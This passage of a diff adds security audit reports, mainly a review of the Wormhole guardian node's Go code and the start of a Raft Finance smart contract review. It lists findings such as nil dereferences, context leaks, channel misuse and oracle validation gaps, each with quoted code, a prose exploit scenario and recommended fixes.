msg.Timestamp), zap.Uint32("Nonce", msg.Nonce), zap.Uint64("Sequence", msg.Sequence), zap.Uint8("ConsistencyLevel", msg.ConsistencyLevel), zap.Stringer("EmitterChain", msg.EmitterChain), zap.Stringer("EmitterAddress", msg.EmitterAddress), zap.Stringer("tokenChain", payload.OriginChain), zap.Stringer("tokenAddress", payload.OriginAddress), zap.Error(err), ) return } Figure 3.1: node/pkg/governor/governor_db.go#L90–L106 func DecodeTransferPayloadHdr(payload []byte) (*TransferPayloadHdr, error) { if !IsTransfer(payload) { return nil, fmt.Errorf("unsupported payload type") } Figure 3.2: sdk/vaa/structs.go#L962–L965 Exploit Scenario Eve finds a code path that allows her to store erroneous payloads within the database of Alice’s node. Alice is unable to restart her node, as it tries to dereference a nil pointer on each attempt. Recommendations Short term, either eliminate the use of payload when constructing the error message, or verify that the payload is not nil before attempting to dereference it. This will eliminate a potential nil pointer dereference. Long term, add tests to exercise additional error paths within governor_db.go. This could help to expose bugs like this one. +4. Unchecked type assertion in queryCoinGecko Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-WORMGUWA-4 Target: node/pkg/governor/governor_prices.go Description The code that processes CoinGecko responses contains an unchecked type assertion. The bug is triggered when CoinGecko returns invalid data, and could be exploited for denial of service (DoS). The relevant code appears in figure 4.1. The data object that is returned as part of CoinGecko’s response to a query is cast to a map m of type map[string]interface{} (yellow). However, the cast’s success is not verified. As a result, a nil pointer dereference can occur when m is accessed (red). m := data.(map[string]interface{}) if len(m) != 0 { var ok bool price, ok = m["usd"].(float64) if !ok { to configured price for this token", zap.String("coinGeckoId", coinGeckoId)) gov.logger.Error("cgov: failed to parse coin gecko response, reverting // By continuing, we leave this one in the local map so the price will get reverted below. continue } } Figure 4.1: node/pkg/governor/governor_prices.go#L144–L153 Note that if the access to m is successful, the resulting value is cast to a float64. In this case, the cast’s success is verified. A similar check should be performed for the earlier cast. Exploit Scenario Eve, a malicious insider at CoinGecko, sends invalid data to Wormhole nodes, causing them to crash. Recommendations Short term, in the code in figure 4.1, verify that the cast in yellow is successful by adding a check similar to the one highlighted in green. This will eliminate the possibility of a node crashing because CoinGecko returns invalid data. Long term, consider enabling the forcetypeassert lint in CI. This bug was initially flagged by that lint, and then confirmed by our queryCoinGecko response fuzzer. Enabling the lint could help to expose additional bugs like this one. +5. Governor relies on a single external source of truth for asset prices Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-WORMGUWA-5 Target: node/pkg/governor/governor_prices.go Description The governor relies on a single external source (CoinGecko) for asset prices, which could enable an attacker to transfer more than they would otherwise be allowed. The governor fetches an asset’s price from CoinGecko, compares the price to a hard-coded default, and uses whichever is larger (figure 5.1). However, if an asset’s price were to grow much larger than the hard-coded default, the hard-coded default would essentially be meaningless, and CoinGecko would become the sole source of truth for the price of that asset. Such a situation could be problematic, for example, if the asset’s price were volatile and CoinGecko had trouble keeping up with the price changes. // We should use the max(coinGeckoPrice, configuredPrice) as our price for computing notional value. func (te tokenEntry) updatePrice() { if (te.coinGeckoPrice == nil) || (te.coinGeckoPrice.Cmp(te.cfgPrice) < 0) { te.price.Set(te.cfgPrice) } else { te.price.Set(te.coinGeckoPrice) } } Figure 5.1: node/pkg/governor/governor_prices.go#L205–L212 Exploit Scenario Eve obtains a large quantity of AliceCoin from a hack. AliceCoin’s price is both highly volatile and much larger than what was hard-coded in the last Wormhole release. CoinGecko has trouble keeping up with the current price of AliceCoin. Eve identifies a point in time when the price that CoinGecko reports is low (but still higher than the hard-coded default). Eve uses the opportunity to move more of her maliciously obtained AliceCoin than Wormhole would allow if CoinGecko had reported the correct price. Recommendations Short term, monitor the price of assets supported by Wormhole. If the price of an asset increases substantially, consider issuing a release that takes into account the new price. This will help to avoid situations where CoinGecko becomes the sole source of truth of the price of an asset. Long term, incorporate additional price oracles besides CoinGecko. This will provide more robust protection than requiring a human to monitor prices and issue point releases. +6. Potential resource leak Severity: Informational Difficulty: High Type: Denial of Service Finding ID: TOB-WORMGUWA-6 Target: node/pkg/watchers/evm/watcher.go Description Calls to some Contexts’ cancel functions are missing along certain code paths involving panics. If an attacker were able to exercise these code paths in rapid succession, they could exhaust system resources and cause a DoS. Within watcher.go, WithTimeout is essentially used in one of two ways, using the pattern shown in either figure 6.1 or 6.2. The pattern of figure 6.1 is problematic because cancel will not be called if a panic occurs in MessageEventsForTransaction. By comparison, cancel will be called if a panic occurs after the defer statement in figure 6.2. Note that if a panic occurred in either figure 6.1 or 6.2, RunWithScissors (figure 6.3) would prevent the program from terminating. timeout, cancel := context.WithTimeout(ctx, 5*time.Second) blockNumber, msgs, err := MessageEventsForTransaction(timeout, w.ethConn, w.contract, w.chainID, tx) cancel() Figure 6.1: node/pkg/watchers/evm/watcher.go#L395–L397 timeout, cancel := context.WithTimeout(ctx, 15*time.Second) defer cancel() Figure 6.2: node/pkg/watchers/evm/watcher.go#L186–L187 // Start a go routine with recovering from any panic by sending an error to a error channel func RunWithScissors(ctx context.Context, errC chan error, name string, runnable supervisor.Runnable) { ScissorsErrors.WithLabelValues("scissors", name).Add(0) go func() { defer func() { if r := recover(); r != nil { switch x := r.(type) { case error: errC <- fmt.Errorf("%s: %w", name, x) default: errC <- fmt.Errorf("%s: %v", name, x) } ScissorsErrors.WithLabelValues("scissors", name).Inc() } }() err := runnable(ctx) if err != nil { errC <- err } }() } Figure 6.3: node/pkg/common/scissors.go#L20–L41 Golang’s official Context documentation states: The WithCancel, WithDeadline, and WithTimeout functions take a Context (the parent) and return a derived Context (the child) and a CancelFunc. … Failing to call the CancelFunc leaks the child and its children until the parent is canceled or the timer fires. … In light of the above guidance, it seems prudent to call the cancel function, even along panicking paths. Note that the problem described applies to three locations in watch.go: one involving a call to MessageEventsForTransaction (figure 6.1), one involving a call to TimeOfBlockByHash, and one involving a call to TransactionReceipt. Exploit Scenario Eve discovers a code path she can call in rapid succession, which induces a panic in the call to MessageEventsForTransaction (figure 6.1). Eve exploits this code path to crash Wormhole nodes. Recommendations Short term, use the defer cancel() pattern (figure 6.2) wherever WithTimeout is used. This will help to prevent DoS conditions. Long term, regard all code involving Contexts with heightened scrutiny. Contexts are frequently a source of resource leaks in Go programs, and deserve elevated attention. References ● Golang Context WithTimeout Example +7. PolygonConnector does not properly use channels Severity: Undetermined Difficulty: Undetermined Type: Timing Finding ID: TOB-WORMGUWA-7 Target: node/pkg/watchers/evm/connectors/polygon.go Description The Polygon connector does not read from the PollSubscription.quit channel, nor does it write to the PollSubscription.unsubDone channel. A caller who calls Unsubscribe on the PollSubscription could hang. A PollSubscription struct contains three channels: err, quit, and unsubDone (figure 7.1). Based on our understanding of the code, the entity that fulfills the subscription writes to the err and unsubDone channels, and reads from the quit channel. Conversely, the entity that consumes the subscription reads from the err and unsubDone channels, and writes to the quit channel.1 type PollSubscription struct { errOnce err quit unsubDone chan struct{} sync.Once chan error chan error } Figure 7.1: node/pkg/watchers/evm/connectors/common.go#L38–L43 More specifically, the consumer can call PollSubscription.Unsubscribe, which writes ErrUnsubscribed to the quit channel and waits for a message on the unsubDone channel (figure 7.2). func (sub *PollSubscription) Unsubscribe() { sub.errOnce.Do(func() { select { case sub.quit <- ErrUnsubscribed: <-sub.unsubDone case <-sub.unsubDone: } close(sub.err) }) } Figure 7.2: node/pkg/watchers/evm/connectors/common.go#L59–L68 1 If our understanding is correct, we recommend documenting these facts. However, the Polygon connector does not read from the quit channel, nor does it write to the unsubDone channel (figure 7.3). This is unlike BlockPollConnector (figure 7.4), for example. Thus, if a caller tries to call Unsubscribe on the Polygon connector PollSubscription, the caller may hang. select { case <-ctx.Done(): return nil case err := <-messageSub.Err(): sub.err <- err case checkpoint := <-messageC: if err := c.processCheckpoint(ctx, sink, checkpoint); err != nil { sub.err <- fmt.Errorf("failed to process checkpoint: %w", err) } } Figure 7.3: node/pkg/watchers/evm/connectors/polygon.go#L120–L129 select { case <-ctx.Done(): blockSub.Unsubscribe() innerErrSub.Unsubscribe() return nil case <-sub.quit: blockSub.Unsubscribe() innerErrSub.Unsubscribe() sub.unsubDone <- struct{}{} return nil case v := <-innerErrSink: sub.err <- fmt.Errorf(v) } Figure 7.4: node/pkg/watchers/evm/connectors/poller.go#L180–L192 Exploit Scenario Alice, a Wormhole developer, adds a code path that involves calling Unsubscribe on a Polygon connector’s PollSubscription. By doing so, Alice introduces a deadlock into the code. Recommendations Short term, adjust the code in figure 7.3 so that it reads from the quit channel and writes to the unsubDone channel, similar to how the code in figure 7.4 does. This will eliminate a class of code paths along which hangs or deadlocks could occur. Long term, consider refactoring the code so that the select statements in figures 7.3 and 7.4, as well as a similar statement in LogPollConnector, are consolidated under a single function. The three statements appear similar in their behavior; combining them would make the code more robust against future changes and could help to prevent bugs like this one. +8. Receiver closes channel, contradicting Golang guidance Severity: Undetermined Difficulty: Undetermined Type: Timing Finding ID: TOB-WORMGUWA-8 Target: node/pkg/watchers/evm/connectors/common.go Description According to Golang’s official guidance, “Only the sender should close a channel, never the receiver. Sending on a closed channel will cause a panic.” However, along some code paths within the watcher code, the receiver of a channel closes the channel. When PollSubscription.Unscbscribe is called, it closes the err channel (figure 8.1). However, in logpoller.go (figure 8.2), the caller of Unsubscribe (red) is clearly an err channel receiver (green). func (sub *PollSubscription) Err() <-chan error { return sub.err } func (sub *PollSubscription) Unsubscribe() { sub.errOnce.Do(func() { select { case sub.quit <- ErrUnsubscribed: <-sub.unsubDone case <-sub.unsubDone: } close(sub.err) }) } Figure 8.1: node/pkg/watchers/evm/connectors/common.go#L55–L68 sub, err := l.SubscribeForBlocks(ctx, errC, blockChan) if err != nil { return err } defer sub.Unsubscribe() supervisor.Signal(ctx, supervisor.SignalHealthy) for { select { case <-ctx.Done(): return ctx.Err() case err := <-sub.Err(): return err case err := <-errC: return err case block := <-blockChan: if err := l.processBlock(ctx, logger, block); err != nil { l.errFeed.Send(err.Error()) } } } Figure 8.2: node/pkg/watchers/evm/connectors/logpoller.go#L49–L69 Exploit Scenario Eve discovers a code path along which a sender tries to send to an already closed err channel and panics. RunWithScissors (see TOB-WORMGUWA-6) prevents the node from terminating, but the node is left in an undetermined state. Recommendations Short term, eliminate the call to close in figure 8.1. This will eliminate a class of code paths along which the err channel’s sender(s) could panic. Long term, for each channel, document who the expected senders and receivers are. This will help catch bugs like this one. References ● A Tour of Go: Range and Close +9. Watcher configuration is overly complex Severity: Informational Difficulty: Medium Type: Data Validation Finding ID: TOB-WORMGUWA-9 Target: node/pkg/watchers/evm/watcher.go Description The Run function of the Watcher configures each chain’s connection based on its fields, unsafeDevMode and chainID. This is done in a series of nested if-statements that span over 100 lines, amounting to a cyclomatic complexity over 90 which far exceeds what is considered complex. In order to make the code easier to understand, test, and maintain, it should be refactored. Rather than handling all of the business logic in a monolithic function, the logic for each chain should be isolated within a dedicated helper function. This would make the code easier to follow and reduce the likelihood that an update to one chain’s configuration inadvertently introduces a bug for other chains. if w.chainID == vaa.ChainIDCelo && !w.unsafeDevMode { // When we are running in mainnet or testnet, we need to use the Celo ethereum library rather than go-ethereum. // However, in devnet, we currently run the standard ETH node for Celo, so we need to use the standard go-ethereum. w.ethConn, err = connectors.NewCeloConnector(timeout, w.networkName, w.url, w.contract, logger) if err != nil { ethConnectionErrors.WithLabelValues(w.networkName, "dial_error").Inc() p2p.DefaultRegistry.AddErrorCount(w.chainID, 1) return fmt.Errorf("dialing eth client failed: %w", err) } } else if useFinalizedBlocks { if w.chainID == vaa.ChainIDEthereum && !w.unsafeDevMode { safeBlocksSupported = true logger.Info("using finalized blocks, will publish safe blocks") } else { logger.Info("using finalized blocks") } [...] /* many more nested branches */ Figure 9.1: node/pkg/watchers/evm/watcher.go#L192–L326 Exploit Scenario Alice, a wormhole developer, introduces a bug that causes guardians to run in unsafe mode in production while adding support for a new evm chain due to the difficulty of modifying and testing the nested code. Recommendations Short term, isolate each chain’s configuration into a helper function and document how the configurations were determined. Long term, run linters in CI to identify code with high cyclomatic complexity and consider whether complex code can be simplified during code reviews. +10. evm.Watcher.Run’s default behavior could hide bugs Severity: Informational Difficulty: High Type: Patching Finding ID: TOB-WORMGUWA-10 Target: node/{cmd/guardiand/node.go, pkg/watchers/evm/watcher.go} Description evm.Watcher.Run tries to create an evm watcher, even if called with a ChainID that does not correspond to an evm chain. Additional checks should be added to evm.Watcher.Run to reject such ChainIDs. Approximately 60 watchers are started in node/cmd/guardiand/node.go (figure 10.1). Fifteen of those starts result in calls to evm.Watcher.Run. Given the substantial number of ChainIDs, one can imagine a bug where a developer tries to create an evm watcher with a ChainID that is not for an evm chain. Such a ChainID would be handled by the blanket else in figure 10.2, which tries to create an evm watcher. Such behavior could allow the bug to go unnoticed. To avoid this possibility, evm.Watcher.Run’s default behavior should be to fail rather than to create a watcher. if shouldStart(ethRPC) { ... ethWatcher = evm.NewEthWatcher(*ethRPC, ethContractAddr, "eth", common.ReadinessEthSyncing, vaa.ChainIDEthereum, chainMsgC[vaa.ChainIDEthereum], setWriteC, chainObsvReqC[vaa.ChainIDEthereum], *unsafeDevMode) ... } if shouldStart(bscRPC) { ... bscWatcher := evm.NewEthWatcher(*bscRPC, bscContractAddr, "bsc", common.ReadinessBSCSyncing, vaa.ChainIDBSC, chainMsgC[vaa.ChainIDBSC], nil, chainObsvReqC[vaa.ChainIDBSC], *unsafeDevMode) ... } if shouldStart(polygonRPC) { ... polygonWatcher := evm.NewEthWatcher(*polygonRPC, polygonContractAddr, "polygon", common.ReadinessPolygonSyncing, vaa.ChainIDPolygon, chainMsgC[vaa.ChainIDPolygon], nil, chainObsvReqC[vaa.ChainIDPolygon], *unsafeDevMode) } ... Figure 10.1: node/cmd/guardiand/node.go#L1065–L1104 ... } else if w.chainID == vaa.ChainIDOptimism && !w.unsafeDevMode { ... } else if w.chainID == vaa.ChainIDPolygon && w.usePolygonCheckpointing() { ... } else { w.ethConn, err = connectors.NewEthereumConnector(timeout, w.networkName, w.url, w.contract, logger) if err != nil { ethConnectionErrors.WithLabelValues(w.networkName, "dial_error").Inc() p2p.DefaultRegistry.AddErrorCount(w.chainID, 1) return fmt.Errorf("dialing eth client failed: %w", err) } } Figure 10.2: node/pkg/watchers/evm/watcher.go#L192–L326 Exploit Scenario Alice, a Wormhole developer, introduces a call to NewEvmWatcher with a ChainID that is not for an evm chain. evm.Watcher.Run accepts the invalid ChainID, and the error goes unnoticed. Recommendations Short term, rewrite evm.Watcher.Run so that a new watcher is created only when a ChainID for an evm chain is passed. When a ChainID for some other chain is passed, evm.Watcher.Run should return an error. Adopting such a strategy will help protect against bugs in node/cmd/guardiand/node.go. Long term: ● Add tests to the guardiand package to verify that the right watcher is created for each ChainID. This will help ensure the package’s correctness. ● Consider whether TOB-WORMGUWA-9’s recommendations should also apply to node/cmd/guardiand/node.go. That is, consider whether the watcher configuration should be handled in node/cmd/guardiand/node.go, as opposed to evm.Watcher.Run. The file node/cmd/guardiand/node.go appears to suffer from similar complexity issues. It is possible that a single strategy could address the shortcomings of both pieces of code. +11. Race condition in TestBlockPoller Severity: Informational Difficulty: Medium Type: Timing Finding ID: TOB-WORMGUWA-11 Target: node/pkg/watchers/evm/connectors/poller_test.go Description A race condition causes TestBlockPoller to fail sporadically with the error message in figure 11.1. For a test to be of value, it must be reliable. poller_test.go:300: Error Trace: Error: .../node/pkg/watchers/evm/connectors/poller_test.go:300 Received unexpected error: polling encountered an error: failed to look up latest block: RPC failed Test: TestBlockPoller Figure 11.1: Error produced when TestBlockPoller fails A potential code interleaving causing the above error appears in figure 11.2. The interleaving can be explained as follows: ● The main thread sets the baseConnector’s error and yields (left column). ● The go routine declared at poller_test.go:189 retrieves the error, sets the err variable, loops, retrieves the error a second time, and yields (right column). ● The main thread locks the mutex, verifies that err is set, clears err, and unlocks the mutex (left). ● The go routine sets the err variable a second time (right). ● The main thread locks the mutex and panics because err is set (left). baseConnector.setError(fmt.Errorf("RPC failed")) case thisErr := <-headerSubscription.Err(): mutex.Lock() err = thisErr mutex.Unlock() ... case thisErr := <-headerSubscription.Err(): time.Sleep(10 * time.Millisecond) mutex.Lock() require.Equal(t, 1, pollerStatus) assert.Error(t, err) assert.Nil(t, block) baseConnector.setError(nil) err = nil mutex.Unlock() // Post the next block and verify we get it (so we survived the RPC error). baseConnector.setBlockNumber(0x309a10) time.Sleep(10 * time.Millisecond) mutex.Lock() require.Equal(t, 1, pollerStatus) require.NoError(t, err) mutex.Lock() err = thisErr mutex.Unlock() Figure 11.2: Interleaving of node/pkg/watchers/evm/connectors/poller_test.go#L283–L300 (left) and node/pkg/watchers/evm/connectors/poller_test.go#L198–L201 (right) that causes an error Exploit Scenario Alice, a Wormhole developer, ignores TestBlockPoller failures because she believes the test to be flaky. In reality, the test is flagging a bug in Alice’s code, which she commits to the Wormhole repository. Recommendations Short term: ● Use different synchronization mechanisms in order to eliminate the race condition described above. This will increase TestBlockPoller’s reliability. ● Have the main thread sleep for random rather than fixed intervals. This will help to expose bugs like this one. Long term, investigate automated tools for finding concurrency bugs in Go programs. This bug is not flagged by Go’s race detector. As a result, different analyses are needed. +12. Unconventional test structure Severity: Informational Difficulty: High Type: Testing Finding ID: TOB-WORMGUWA-12 Target: Various source files in node/pkg/watchers Description Tilt is the primary means of testing Wormhole watchers. Relying on such a coarse testing mechanism makes it difficult to know that all necessary conditions and edge cases are tested. The following are some conditions that should be checked by native Go unit tests: ● The right watcher is created for each ChainID (TOB-WORMGUWA-10). ● The evm watchers’ connectors behave correctly (similar to how the evm finalizers’ correct behavior is now tested).2 ● The evm watchers’ logpoller behaves correctly (similar to how the poller’s correct behavior is now tested by poller_test.go). ● There are no off-by-one errors in any inequality involving a block or round number. Examples of such inequalities include the following: ○ node/pkg/watchers/algorand/watcher.go#L225 ○ node/pkg/watchers/algorand/watcher.go#L243 ○ node/pkg/watchers/solana/client.go#L363 ○ node/pkg/watchers/solana/client.go#L841 To be clear, we are not suggesting that the Tilt tests be discarded. However, the Tilt tests should not be the sole means of testing the watchers for any given chain. Exploit Scenario Alice, a Wormhole developer, introduces a bug into the codebase. The bug is not exposed by the Tilt tests. Recommendations Short term, develop unit tests for the watcher code. Get as close to 100% code coverage as possible. Develop specific unit tests for conditions that seem especially problematic. These steps will help ensure the correctness of the watcher code. 2 Note that the evm watchers’ finalizers have nearly 100% code coverage by unit tests. Long term, regularly review test coverage to help identify gaps in the tests as the code evolves. +13. Vulnerable Go packages Severity: Undetermined Difficulty: Undetermined Type: Patching Finding ID: TOB-WORMGUWA-13 Target: node/go.mod Description govulncheck reports that the packages used by Wormhole in table 13.1 have known vulnerabilities, which are described in the following table. Package Vulnerability Description excerpt path/filepath GO-2023-1568 A path traversal vulnerability exists in filepath.Clean on Windows. … mime/multipart GO-2023-1569 A denial of service is possible from excessive resource consumption in net/http and mime/multipart. … crypto/tls GO-2023-1570 Large handshake records may cause panics in crypto/tls. … golang.org/x/net GO-2023-1571 A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests. Table 13.1: Vulnerabilities in dependencies reported by govulncheck Exploit Scenario Eve discovers an exploitable code path involving one of the vulnerabilities in table 13.1 and uses it to crash Wormhole nodes. Recommendations Short term, update Wormhole to Go version 1.20.1. This will mitigate all of the vulnerabilities in table 13.1, according to the vulnerability descriptions. Long term, run govulncheck as part of Wormhole’s CI process. This will help to identify vulnerable dependencies as they arise. References ● Vulnerability Management for Go +14. Wormhole node does not build with latest Go version Severity: Informational Difficulty: High Type: Patching Finding ID: TOB-WORMGUWA-14 Target: Various source files Description Attempting to build a Wormhole node with the latest Go version (1.20.1) produces the error in figure 14.1. Go’s release policy states, “Each major Go release is supported until there are two newer major releases.” By not building with the latest Go version, Wormhole’s ability to receive updates will expire. cannot use "The version of quic-go you're using can't be built on Go 1.20 yet. For more details, please see https://github.com/lucas-clemente/quic-go/wiki/quic-go-and-Go-versions." (untyped string constant "The version of quic-go you're using can't be built on Go 1.20 yet. F...) as int value in variable declaration Figure 14.1: Error produced when one tries to build the Wormhole with the latest Go version (1.20) It is unclear when Go 1.21 will be released. Go 1.20 was released on February 1, 2023 (a few days prior to the start of the audit), and new versions appear to be released about every six months. We found a thread discussing Go 1.21, but it does not mention dates. Exploit Scenario Alice attempts to build a Wormhole node with Go version 1.20. When her attempt fails, Alice switches to Go version 1.19. Go 1.21 is released, and Go 1.19 ceases to receive updates. A vulnerability is found in a Go 1.19 package, and Alice is left vulnerable. Recommendations Short term, adapt the code so that it builds with Go version 1.20. This will allow Wormhole to receive updates for a greater period of time than if it builds only with Go version 1.19. Long term, test with the latest Go version in CI. This will help identify incompatibilities like this one sooner. References ● Go Release History (see Release Policy) ● Planning Go 1. +15. Missing or wrong context Severity: Low Type: Timing Difficulty: High Finding ID: TOB-WORMGUWA-15 Target: node/pkg/watchers/{algorand, cosmwasm, sui, wormchain}/ watcher.go Description In several places where a Context is required, the Wormhole node creates a new background Context rather than using the passed-in Context. If the passed-in Context is canceled or times out, a go routine using the background Context will not detect this, and resources will be leaked. The aforementioned problem is flagged by the contextcheck lint. For each of the locations named in figure 15.1, a Context is passed in to the enclosing function, but the passed-in Context is not used. Rather, a new background Context is created. algorand/watcher.go:172:51: Non-inherited new context, use function like `context.WithXXX` instead (contextcheck) status, err := algodClient.StatusAfterBlock(0).Do(context.Background()) ^ algorand/watcher.go:196:139: Non-inherited new context, use function like `context.WithXXX` instead (contextcheck) result, err := indexerClient.SearchForTransactions().TXID(base32.StdEncoding.WithPadding(base32.NoP adding).EncodeToString(r.TxHash)).Do(context.Background()) ^ algorand/watcher.go:205:42: Non-inherited new context, use function like `context.WithXXX` instead (contextcheck) block, err := algodClient.Block(r).Do(context.Background()) ^ Figure 15.1: Warnings produced by contextcheck A closely related problem is flagged by the noctx lint. In each of the locations named in figure 15.2, http.Get or http.Post is used. These functions do not take a Context argument. As such, if the Context passed in to the enclosing function is canceled, the Get or Post will not similarly be canceled. cosmwasm/watcher.go:198:28: (*net/http.Client).Get must not be called (noctx) resp, err := client.Get(fmt.Sprintf("%s/%s", e.urlLCD, e.latestBlockURL)) ^ cosmwasm/watcher.go:246:28: (*net/http.Client).Get must not be called (noctx) resp, err := client.Get(fmt.Sprintf("%s/cosmos/tx/v1beta1/txs/%s", e.urlLCD, tx)) ^ sui/watcher.go:315:26: net/http.Post must not be called (noctx) resp, err := http.Post(e.suiRPC, "application/json", strings.NewReader(buf)) ^ sui/watcher.go:378:26: net/http.Post must not be called (noctx) strings.NewReader(`{"jsonrpc":"2.0", "id": 1, "method": "sui_getCommitteeInfo", "params": []}`)) resp, err := http.Post(e.suiRPC, "application/json", ^ wormchain/watcher.go:136:27: (*net/http.Client).Get must not be called (noctx) resp, err := client.Get(fmt.Sprintf("%s/blocks/latest", e.urlLCD)) Figure 15.2: Warnings produced by noctx ^ Exploit Scenario A bug causes Alice’s Algorand, Cosmwasm, Sui, or Wormchain node to hang. The bug triggers repeatedly. The connections from Alice’s Wormhole node to the respective blockchain nodes hang, causing unnecessary resource consumption. Recommendations Short term, take the following steps: ● For each location named in figure 15.1, use the passed-in Context rather than creating a new background Context. ● For each location named in figure 15.2, rewrite the code to use http.Client.Do. Taking these steps will help to prevent unnecessary resource consumption and potential denial of service. Long term, enable the contextcheck and notctx lints in CI. The problems highlighted in this finding were uncovered by those lints. Running them regularly could help to identify similar problems. References ● checkcontext ● noctx +16. Use of defer in a loop Severity: Low Difficulty: High Type: Denial of Service Finding ID: TOB-WORMGUWA-16 Target: node/pkg/watchers/solana/client.go Description The Solana watcher uses defer within an infinite loop (figure 16.1). Deferred calls are executed when their enclosing function returns. Since the enclosing loop is not exited under normal circumstances, the deferred calls are never executed and constitute a waste of resources. for { select { case <-ctx.Done(): return nil default: rCtx, cancel := context.WithTimeout(ctx, time.Second*300) // 5 minute defer cancel() ... } } Figure 16.1: node/pkg/watchers/solana/client.go#L244–L271 Sample code demonstrating the problem appears in appendix E. Exploit Scenario Alice runs her Wormhole node in an environment with constrained resources. Alice finds that her node is not able to achieve the same uptime as other Wormhole nodes. The underlying cause is resource exhaustion caused by the Solana watcher. Recommendations Short term, rewrite the code in figure 16.1 to eliminate the use of defer in the for loop. The easiest and most straightforward way would likely be to move the code in the default case into its own named function. Eliminating this use of defer in a loop will eliminate a potential source of resource exhaustion. Long term, regularly review uses of defer to ensure they do not appear in a loop. To the best of our knowledge, there are not publicly available detectors for problems like this. However, regular manual review should be sufficient to spot them. +17. Finalizer is allowed to be nil Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-WORMGUWA-17 Target: node/pkg/watchers/evm/connectors/poller.go Description The configuration of a chain’s watcher can allow a finalizer to be nil, which may allow newly introduced bugs to go unnoticed. Whenever a chain’s RPC does not have a notion of “safe” or “finalized” blocks, the watcher polls the chain for the latest block using BlockPollConnector. After fetching a block, the watcher checks whether it is “final” in accordance with the respective chain’s PollFinalizer implementation. // BlockPollConnector polls for new blocks instead of subscribing when using SubscribeForBlocks. It allows to specify a // finalizer which will be used to only return finalized blocks on subscriptions. type BlockPollConnector struct { Connector time.Duration Delay useFinalized bool publishSafeBlocks bool finalizer blockFeed errFeed PollFinalizer ethEvent.Feed ethEvent.Feed } Figure 17.1: node/pkg/watchers/evm/connectors/poller.go#L24–L34 However, the method pollBlocks allows BlockPollConnector to have a nil PollFinalizer (see figure 17.2). This is unnecessary and may permit edge cases that could otherwise be avoided by requiring all BlockPollConnectors to use the DefaultFinalizer explicitly if a finalizer is not required (the default finalizer accepts all blocks as final). This will ensure that the watcher does not incidentally process a block received from blockFeed that is not in the canonical chain . if b.finalizer != nil { finalized, err := b.finalizer.IsBlockFinalized(timeout, block) if err != nil { logger.Error("failed to check block finalization", zap.Uint64("block", block.Number.Uint64()), zap.Error(err)) finalization (%d): %w", block.Number.Uint64(), err) return lastPublishedBlock, fmt.Errorf("failed to check block } if !finalized { break } } b.blockFeed.Send(block) lastPublishedBlock = block Figure 17.2: node/pkg/watchers/evm/connectors/poller.go#L149–L164 Exploit Scenario A developer adds a new chain to the watcher using BlockPollConnector and forgets to add a PollFinalizer. Because a finalizer is not required to receive the latest blocks, transactions that were not included in the blockchain are considered valid, and funds are incorrectly transferred without corresponding deposits. Recommendations Short term, rewrite the block poller to require a finalizer. This makes the configuration of the block poller explicit and clarifies that a DefaultFinalizer is being used, indicating that no extra validations are being performed. Long term, document the configuration and assumptions of each chain. Then, see if any changes could be made to the code to clarify the developers’ intentions. diff --git a/findings_newupdate/tob/2023-04-chainflip-securityreview.txt b/findings_newupdate/tob/2023-04-chainflip-securityreview.txt new file mode 100644 index 0000000..8d1c8b6 --- /dev/null +++ b/findings_newupdate/tob/2023-04-chainflip-securityreview.txt @@ -0,0 +1 @@ + diff --git a/findings_newupdate/tob/2023-04-tempus-raft-securityreview.txt b/findings_newupdate/tob/2023-04-tempus-raft-securityreview.txt new file mode 100644 index 0000000..cdafce1 --- /dev/null +++ b/findings_newupdate/tob/2023-04-tempus-raft-securityreview.txt @@ -0,0 +1,15 @@ +1. Solidity compiler optimizations can be problematic Severity: Informational Difficulty: High Type: Undefined Behavior Finding ID: TOB-RAFT-1 Target: foundry.toml Description The Raft Finance contracts have enabled compiler optimizations. There have been several optimization bugs with security implications. Additionally, optimizations are actively being developed . Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild use them, so how well they are being tested and exercised is unknown. High-severity security issues due to optimization bugs have occurred in the past. For example, a high-severity bug in the emscripten-generated solc-js compiler used by Truffle and Remix persisted until late 2018. The fix for this bug was not reported in the Solidity CHANGELOG . Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity v0.5.6 . More recently, a bug due to the incorrect caching of Keccak-256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations causes a security vulnerability in the Raft Finance contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity. +2. Issues with Chainlink oracle’s return data validation Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-RAFT-2 Target: contracts/Oracles/ChainlinkPriceOracle.sol Description Chainlink oracles are used to compute the price of a collateral token throughout the protocol. When validating the oracle's return data, the returned price is compared to the price of the previous round. However, there are a few issues with the validation: ● ● ● The increase of the currentRoundId value may not be statically increasing across rounds. The only requirement is that the roundID increases monotonically. The updatedAt value in the oracle response is never checked, so potentially stale data could be coming from the priceAggregator contract. The roundId and answeredInRound values in the oracle response are not checked for equality, which could indicate that the answer returned by the oracle is fresh. function _badChainlinkResponse (ChainlinkResponse memory response) internal view returns ( bool ) { return !response.success || response.roundId == 0 || response.timestamp == 0 || response.timestamp > block.timestamp || response.answer <= 0 ; } Figure 2.1: The Chainlink oracle response validation logic Exploit Scenario The Chainlink oracle attempts to compare the current returned price to the price in the previous roundID . However, because the roundID did not increase by one from the previous round to the current round, the request fails, and the price oracle returns a failure. A stale price is then used by the protocol. Recommendations Short term, have the code validate that the timestamp value is greater than 0 to ensure that the data is fresh. Also, have the code check that the roundID and answeredInRound values are equal to ensure that the returned answer is not stale. Lastly check that the timestamp value is not decreasing from round to round. Long term, carefully investigate oracle integrations for potential footguns in order to conform to correct API usage. References ● The Historical-Price-Feed-Data Project +3. Incorrect constant for 1000-year periods Severity: Informational Difficulty: High Type: Configuration Finding ID: TOB-RAFT-3 Target: contracts/Dependencies/MathUtils.sol Description The Raft finance contracts rely on computing the exponential decay to determine the correct base rate for redemptions. In the MathUtils library, a period of 1000 years is chosen as the maximum time period for the decay exponent to prevent an overflow. However, the _MINUTES_IN_1000_YEARS constant used is currently incorrect: /// @notice Number of minutes in 1000 years. uint256 internal constant 